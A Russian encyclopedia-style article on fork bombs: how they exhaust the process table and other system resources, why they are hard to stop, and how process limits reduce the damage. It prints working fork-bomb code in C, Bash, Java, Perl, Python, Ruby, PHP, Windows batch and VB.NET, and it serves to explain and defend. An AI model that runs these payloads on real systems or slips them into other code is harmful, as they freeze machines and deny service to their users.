# Форк-бомба
Форк-бомба — вредоносная или ошибочно написанная программа, бесконечно создающая свои копии (системным вызовом fork()), которые обычно также начинают создавать свои копии и т. д.
Выполнение такой программы может вызывать большую нагрузку вычислительной системы или даже отказ в обслуживании вследствие нехватки системных ресурсов (дескрипторов процессов, памяти, процессорного времени), что и является целью.
Программа классической форк-бомбы (написанная на языке Си) выглядит так:
```
 
#include
 
<unistd.h>

 

 
int
 
main
()

 
{

   
while
(
1
)

     
fork
();

 
}

```

Схожими случаями утечки системных ресурсов являются программы, порождающие зомби и процессы-сироты. Однако, если большинство форк-бомб создаётся намеренно, то эти проблемы обычно являются результатом невнимательности или некомпетентности программиста.

## Описание
Форк-бомба порождает большое количество собственных копий и тем самым пытается заполнить свободное место в списке активных процессов операционной системы. После заполнения списка процессов становится невозможным старт полезной программы. Даже если какой-либо другой процесс прекратит работу и место в списке процессов освободится, то старт полезной программы маловероятен, так как множество других копий форк-бомбы уже ждут возможности запустить свою очередную копию.
Кроме заполнения списка процессов, возможны также стратегии заполнения виртуальной памяти, процессорного времени, сокетов и других системных ресурсов. Результатом исчерпания этих ресурсов становится замедление работы или практически остановка операционной системы и/или полезных программ (зависание компьютера).
Форк-бомба может быть получена и в результате ошибки при добросовестном программировании. Например, программа, слушающая сетевой порт, может при получении сетевого пакета или установлении соединения «упасть» в бесконечный цикл создания своих копий для обработки пакета или соединения. Простая ошибка программирования может привести к утечке памяти или к последствиям, характерным для результатов работы форк-бомбы.

## Примеры форк-бомб на разных языках программирования
C:
```
#include
 
<stdlib.h>

int
 
main
(
void
)

{

    
for
(;;)
 
{

        
system
(
"start"
);

    
}

}

```

или:
```
#include
 
<unistd.h>

int
 
main
(
void
)

{

    
while
(
fork
())
 
{};

}

```

Bash:
```
 
:
(){
 
:
|
:
&
 
}
;
:

```

или
```
fork
()
 
{

    
fork
 
|
 
fork
 
&

}

fork

```

Java:
```
public
 
class
 
forkbomb

{

	
public
 
static
 
void
 
main
(
String
[]
 
args
)

	
{

		
Runtime
.
getRuntime
().
exec
(
new
 
String
[]
{
"javaw"
,
 
"-cp"
,
 
System
.
getProperty
(
"java.class.path"
),
 
"forkbomb"
});

	
}

}

```

Perl:
```
 
fork
 
while
 
fork

```

Python:
```
import
 
os

 

while
 
True
:

    
os
.
fork
()

```

В некоторых системах такой вызов запрещен, копирование возможно только при сохранении идентификатора процесса:
```
import
 
os

 

while
 
True
:

    
a
=
os
.
fork
()

```

Ruby:
```
fork
 
while
 
fork

```

Второй вариант:
```
loop
 
{
 
fork
 
}

```

PHP:
```
<?php

while
(
true
)
 
{

    
pcntl_fork
();

}

```

Пакетный файл Microsoft Windows:
```
:
s

start
 
%0

goto
 
:
s

```

Второй вариант
```
start
 
%0
 
%0

```

Вариант на VB.NET
```
Do
 
System
.
Diagnostics
.
Process
.
Start
(
System
.
Reflection
.
Assembly
.
GetExecutingAssembly
().
Location
)
 
Loop
 
While
 
True

```

Псевдокод:
```
алг
 ПрограммаX

пока
 истина
   
нц

      
вызов
 ПрограммаX
   
кц

кон
 
алг
 ПрограммаX
```

## Трудность ликвидации
В случае успешного срабатывания форк-бомбы становится трудным или практически невозможным восстановить нормальную работу ЭВМ без перезагрузки, так как единственный способ прекратить работу форк-бомбы — это одновременное прекращение работы всех работающих копий форк-бомбы. В большинстве реализаций операционных систем вызов команды для прекращения работы процесса требует запуска нового процесса, что в условиях успешно работающей форк-бомбы невозможно.
Однако, на практике некоторые форк-бомбы не требуют таких радикальных мер и могут быть уничтожены без необходимости перезагрузки. Рассмотрим, например, случай бомбы из примера выше:
```
 
:
(){
 
:
|
:
&
 
}
;
:

```

Особенность этого кода в том, что он не зацикливается после неуспешного порождения своих копий, а завершает работу. В результате список процессов постоянно находится на грани заполнения: одна из копий форк-бомбы завершается, и освобождающееся место тут же занимается новосозданным процессом из другой копии форк-бомбы. Становится возможным конкурировать с форк-бомбой за захват места в списке процессов. Тогда возможно рано или поздно запустить команду для одновременного уничтожения всех копий-fork бомбы или запустить безопасную программу, которая будет постепенно «отвоёвывать» место в списке процессов до завершения работы последнего процесса форк-бомбы. Пример такой безопасной программы на zsh:
```
 
while
 
(
sleep
 
100
 
&
!
)
 
do
;
 
done

```

## Предотвращение
Один из способов предотвращения негативных последствий работы форк-бомбы — принудительное ограничение количества процессов, которые пользователь может запустить одновременно. Также могут быть ограничены количество выделяемой виртуальной памяти и другие системные ресурсы. При исчерпании максимума доступных процессов попытка процесса создать новый процесс потерпит неудачу. Максимум запускаемых процессов должен быть таким, чтобы он позволял запустить разумное полезное количество программ, но не приводил к краху системы при одновременном запуске форк-бомбы от всех пользователей системы.
Необходимо отметить, что ограничение количества процессов само по себе не предотвращает запуск форк-бомбы, а лишь направлено на минимизацию возможного вреда в случае её срабатывания.
Другое решение проблемы — интеллектуальное распознавание форк-бомбы средствами самой операционной системы, но это решение не нашло широкого применения.
Существует и такая трудность, что если форк-бомба занимает всё доступное процессорное время, то результаты её работы могут быть катастрофическими не только на однопроцессорной, но и на многопроцессорной системе, даже при ограничении числа процессов. Например, если число процессоров 16, а максимум количества запущенных процессов 100, то на каждый процессор будет приходиться в среднем 6-7 работающих экземпляров форк-бомбы, пожирающих процессорное время. Для решения этой проблемы применяется ограничение по привязке к процессорам.